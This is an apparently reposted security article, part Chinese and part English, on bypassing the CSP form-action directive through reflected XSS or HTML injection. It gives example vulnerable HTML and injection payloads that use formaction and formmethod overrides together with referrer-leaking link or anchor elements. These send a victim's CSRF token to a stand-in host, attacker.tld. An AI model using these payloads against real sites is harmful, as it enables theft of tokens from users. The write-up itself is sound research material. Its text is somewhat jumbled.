使用反射XSS配合form-action绕过CSP
CSP(Content-Security-Policy)是一个HTTP响应头包含指示,指示浏览器如何限制页面上的内容。例如,“表单操作指令”限制什么起源形式提交。CSP表单操作指令可以限制哪些url可能提交表单的页面。这种保护可以绕过的XSS / HTML注入漏洞。
The form-action directive To understand why the “form-action” directive is important from a security perspective, imagine this scenario: Since the CSP doesn’t allow scripts, we can’t use scripts to extract the csrf token. However, by injecting a <form> tag we can override where the form (including the csrf token) will be submitted: Bypass in Chrome The directive can be bypassed by overriding the method of an existing form (using the formmethod attribute) to “GET” and the action (using the formaction attribute) to “” (current page). We then combine this with a referrer leaking element such as “<link rel=’subresource’ href=’http://attacker.tld/link-subresource‘>”. When the victim then clicks our injected submit button, the browser will send the form values to the current page as GET parameters. These GET parameters are then leaked to attacker.tld because of the referrer leaking element. In other words, the form values (including CSRF token) will be sent to http://attacker.tld through the Referer header. form-action bypassed! Demo: 22%20formaction=%22%22%20form=%22subscribe%22% 20formmethod=%22get%22%20/%3E%3Cinput%20type=% 22hidden%22%20name=%22xss%22%20form=%22subscribe% 22%20value=%22%3Clink%20rel=%27subresource%27 %20href=%27http://attacker.tld/link-subresource%27%3E%22/%3E Aftermath: Bypassing in Firefox The attack for Firefox is essentially the same, but instead of using “<link rel=’subresource’ href=’http://attacker.tld’>” we use “<a href=’http://attacker.tld’>”, the downside being that the user has to click twice as opposed to once.Content-Security-Policy: default-src ‘none’; <html><body><div>[Reflected XSS vulnerability here]</div><form method=”POST” id=”subscribe” action=”/api/v1/newsletter/subscribe”><input type=”hidden” name=”csrftoken” value=”5f4dcc3b5aa765d61d8327deb882cf99” /><input type=”submit” value=”Subscribe to newsletter” /></form></body></html>
Content-Security-Policy: default-src ‘none’; <html><body><div><form action=”http://attacker.tld”></div><form method=”POST” id=”subscribe” action=”/api/v1/newsletter/subscribe”><input type=”hidden” name=”csrftoken” value=”5f4dcc3b5aa765d61d8327deb882cf99” /><input type=”submit” value=”Subscribe to newsletter” /></form></body></html>
Content-Security-Policy: default-src ‘none’; <html><body><div><input value="CLICK ME FOR POC" type="submit" formaction="" form="subscribe" formmethod="get" /><input type="hidden" name="xss" form="subscribe" value="<link rel='subresource' href='http://attacker.tld/link-subresource'>"/></div><form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe"><input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" /><input type="submit" value="Subscribe to newsletter" /></form></body></html>
本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)
- ·浅淡苹果系统iOS逆向技术分享
- ·如何通过追踪代码自动发现网站之间的“关
- ·Web安全之XSS
- ·Oracle Advanced Support系统SQL注入漏洞
- ·如何使用Burp Suite Macros绕过防护进行
- ·看我如何挖掘到了某热门网站上的SQLi和XS
- ·如何借助Burp和SQLMap Tamper利用二次注
- ·HTTP|GET 和 POST 区别?网上多数答案都
- ·记一次境外站渗透过程
- ·网络安全渗透测试
- ·常见Web应用安全问题安全性问题
- ·MSF框架实现“永恒之蓝”的闪电攻击
- ·如何通过公开的漏洞披露信息,完成开源程
- ·【技术分享】如何在macOS上监控一个APP的
- ·技术总结-如何转换永恒之蓝(Eternalblu
- ·【技术分享】从JS文件中发现『认证绕过』
- ·浅淡苹果系统iOS逆向技术分享
- ·如何通过追踪代码自动发现网站之间的“关联
- ·Web安全之XSS
- ·Oracle Advanced Support系统SQL注入漏洞挖
- ·如何使用Burp Suite Macros绕过防护进行自
- ·看我如何挖掘到了某热门网站上的SQLi和XSS
- ·如何借助Burp和SQLMap Tamper利用二次注入
- ·HTTP|GET 和 POST 区别?网上多数答案都是
- ·记一次境外站渗透过程
- ·网络安全渗透测试
- ·常见Web应用安全问题安全性问题
- ·MSF框架实现“永恒之蓝”的闪电攻击
- ·如何通过公开的漏洞披露信息,完成开源程序
- ·【技术分享】如何在macOS上监控一个APP的HT
- ·技术总结-如何转换永恒之蓝(Eternalblue